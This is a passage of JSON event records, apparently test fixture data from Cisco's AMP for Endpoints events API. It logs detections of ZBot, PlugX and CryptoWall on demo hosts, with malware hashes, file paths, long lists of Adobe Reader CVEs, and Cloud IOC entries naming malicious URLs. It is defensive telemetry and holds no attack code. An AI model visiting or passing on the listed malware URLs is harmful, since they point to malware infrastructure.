Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266495035441159","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473861","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":404000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473860","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266490740474000,"timestamp":1610704963,"timestamp_nanoseconds":201000000,"date":"2021-01-15T10:02:43+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266490740473859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900074000600,"timestamp":1610704962,"timestamp_nanoseconds":74000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900373000000,"timestamp":1610704962,"timestamp_nanoseconds":373000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"ZBot:FakeAlert-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704962,"start_date":"2021-01-15T10:02:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"disposition":"Unknown","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":560000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506561","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266486445507000,"timestamp":1610704962,"timestamp_nanoseconds":529000000,"date":"2021-01-15T10:02:42+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832266486445506562","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3564327093","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3564327093","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":2084,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395429000700,"timestamp":1610704954,"timestamp_nanoseconds":429000000,"date":"2021-01-15T10:02:34+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610704954,"start_date":"2021-01-15T10:02:34+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"825b7b20a913f26641c012f1cb61b81d29033f142ba6c6734425de06432e4f82"}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0601","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0601"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0602","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0602"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0603","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0603"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0604","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0604"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0605","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0605"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0606","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0606"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0607","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0607"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0608","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0608"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0609","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0609"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0610","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0610"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0611","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0611"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0612","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0612"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0613","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0613"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0614","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0614"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0615","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0615"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0616","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0616"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0617","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0617"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0618","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0618"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0619","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0619"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0620","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0620"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0621","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0621"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0622","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0622"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0623","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0623"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0624","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0624"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0626","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0626"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3346","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3342","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3342"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3341","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3341"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-1376","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1376"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2718","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2718"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2719","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2719"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2720","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2720"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2721","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2721"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2722","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2722"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2723","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2723"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2724","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2724"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2725","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2725"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2726","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2726"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2727","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2727"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2729","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2729"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2730","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2730"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2731","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2731"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2732","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2732"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2733","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2733"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2734","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2734"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2735","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2735"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-2736","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2736"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3340","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3340"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3337","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3337"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3338","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3338"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-3339","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3339"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0641","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0641"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0640","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0640"},{"name":"Adobe Acrobat Reader","version":"9.3.3.177","cve":"CVE-2013-0627","score":7.2,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0627"}]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906243727720000,"timestamp":1610704934,"timestamp_nanoseconds":396000000,"date":"2021-01-15T10:02:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906243727720449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825615424644973000,"timestamp":1610704922,"timestamp_nanoseconds":703000000,"date":"2021-01-15T10:02:02+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112390223000800,"timestamp":1610704898,"timestamp_nanoseconds":965000000,"date":"2021-01-15T10:01:38+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704898,"start_date":"2021-01-15T10:01:38+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Accessed URL matches characteristics of several malware families.","short_description":"GateDotPhp.ioc"},"network_info":{"dirty_url":"http://flashtamp.info/datas/gate.php","parent":{"disposition":"Clean","identity":{"sha256":"72c027273297ccf2f33f5b4c5f5bce3eecc69e5f78b6bbc1dec9e58780a6fd02"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1443112389350000600,"timestamp":1610704885,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:01:25+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704885,"start_date":"2021-01-15T10:01:25+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Svchost.exe accessed a Wordpress URL - this is anomalous and indicative of a process injection.","short_description":"W32.SvchostHitWordpressURL.ioc"},"network_info":{"dirty_url":"http://laptopsinhvien.net/wp-content/plugins/better-wp-security/modules/free/brute-force/js/ap3.php?t=i3fktdvzoauf","parent":{"disposition":"Clean","identity":{"sha256":"cb2bc00985f641f9900aa0adc5fc203eaaf57394412dc4ce4b37222ef519205f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208098324251000,"timestamp":1610704881,"timestamp_nanoseconds":90000000,"date":"2021-01-15T10:01:21+00:00","event_type":"Threat 